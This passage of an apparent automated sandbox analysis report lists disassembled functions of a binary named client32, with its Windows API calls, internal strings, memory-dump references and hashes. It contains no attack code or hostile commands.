                                                                                                                                                                                  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                                                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                                                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                                                                                                                Strings
                                                                                                                                                                                • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                                                                                                                • PCIVideoSlave32, xrefs: 1103F508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Find$MessageSendSleep
                                                                                                                                                                                • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                                                                                                                • API String ID: 1010850397-3146847729
                                                                                                                                                                                • Opcode ID: 03a1e203517e412933cd58f3ae7d9ca43d90567f49957303c8e1f07e44295d01
                                                                                                                                                                                • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                                                                                                                • Opcode Fuzzy Hash: 03a1e203517e412933cd58f3ae7d9ca43d90567f49957303c8e1f07e44295d01
                                                                                                                                                                                • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                                                                                                                Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 110816D7
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                • API String ID: 2441568934-1875806619
                                                                                                                                                                                • Opcode ID: 3f3e7f8e8dc0d1aaa9d76cc3c4d2da92d66641bac020a97180a1fba412a1db4a
                                                                                                                                                                                • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f3e7f8e8dc0d1aaa9d76cc3c4d2da92d66641bac020a97180a1fba412a1db4a
                                                                                                                                                                                • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                                                                                                                Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(?,?,?,110710F9), ref: 11110928
                                                                                                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(?), ref: 11110935
                                                                                                                                                                                • _free.LIBCMT ref: 1103D221
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(?,00000000), ref: 11110970
                                                                                                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                                                                                                                Strings
                                                                                                                                                                                • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                                                                                                                • String ID: Show has overrun too much, aborting
                                                                                                                                                                                • API String ID: 304545663-4092325870
                                                                                                                                                                                • Opcode ID: 1f7d02b9a28002be47aec2c3fd13df13a221ee9c2954a61fb39a08eeee1464e9
                                                                                                                                                                                • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f7d02b9a28002be47aec2c3fd13df13a221ee9c2954a61fb39a08eeee1464e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                                                                                                                Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                                                                                                                • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                • API String ID: 1136984157-1986719024
                                                                                                                                                                                • Opcode ID: 325da5eea192c66b4b3392d5fb3b1762a7663c540394b0308196eeb8af04a542
                                                                                                                                                                                • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                                                                                                                • Opcode Fuzzy Hash: 325da5eea192c66b4b3392d5fb3b1762a7663c540394b0308196eeb8af04a542
                                                                                                                                                                                • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                                                                                                                Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(?), ref: 11027561
                                                                                                                                                                                • EnumWindows.USER32(Function_00027450,00000000), ref: 1102756A
                                                                                                                                                                                • ExitThread.KERNEL32 ref: 11027577
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumExitSleepThreadWindows
                                                                                                                                                                                • String ID: TapiFix
                                                                                                                                                                                • API String ID: 1804117399-2824097521
                                                                                                                                                                                • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                                                                                                • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                                                                                                • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                                                                                                                Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                • API String ID: 1319256379-1986719024
                                                                                                                                                                                • Opcode ID: 8f013c2e61a75d97db9a748ce6be3191c7ed23f4dc613731a0872f037545e2c0
                                                                                                                                                                                • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f013c2e61a75d97db9a748ce6be3191c7ed23f4dc613731a0872f037545e2c0
                                                                                                                                                                                • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                                                                                                                Function 1109B490 Relevance: 6.1, APIs: 4, Instructions: 131COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 1109B4F1
                                                                                                                                                                                • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000C00,00000000,?,?,?), ref: 1109B579
                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1109B5E4
                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1109B5F9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeTask$FileInfoMalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3961622736-0
                                                                                                                                                                                • Opcode ID: 612949a89299fc813d7a9716f3062224ba1cdc90a57ce24bd90ab56d1664ee5b
                                                                                                                                                                                • Instruction ID: e4ea8b2becaedbb40d86352605078be78821e7084e847ed3df827cd87a39c4c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 612949a89299fc813d7a9716f3062224ba1cdc90a57ce24bd90ab56d1664ee5b
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C415875A0461C9FDB10CF68CCA0FEAB7B9EB49714F8041D9E40DA7240DA71AE85DFA0
                                                                                                                                                                                Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __flsbuf__flush__write_memmove
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1275964137-0
                                                                                                                                                                                • Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                                                                                                                • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                                                                                                                                • Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                                                                                                                • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                                                                                                                                Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 1106791B
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 11067957
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 110679AA
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 110679EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BeepMessage
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2359647504-0
                                                                                                                                                                                • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                                                                                                                • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                                                                                                                                Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00027690,00000000,00000000,111EE468), ref: 11029813
                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 11029832
                                                                                                                                                                                • PostThreadMessageA.USER32(00000000,00000500,?,00000000), ref: 11029854
                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 1102985C
                                                                                                                                                                                Memory Dump Source
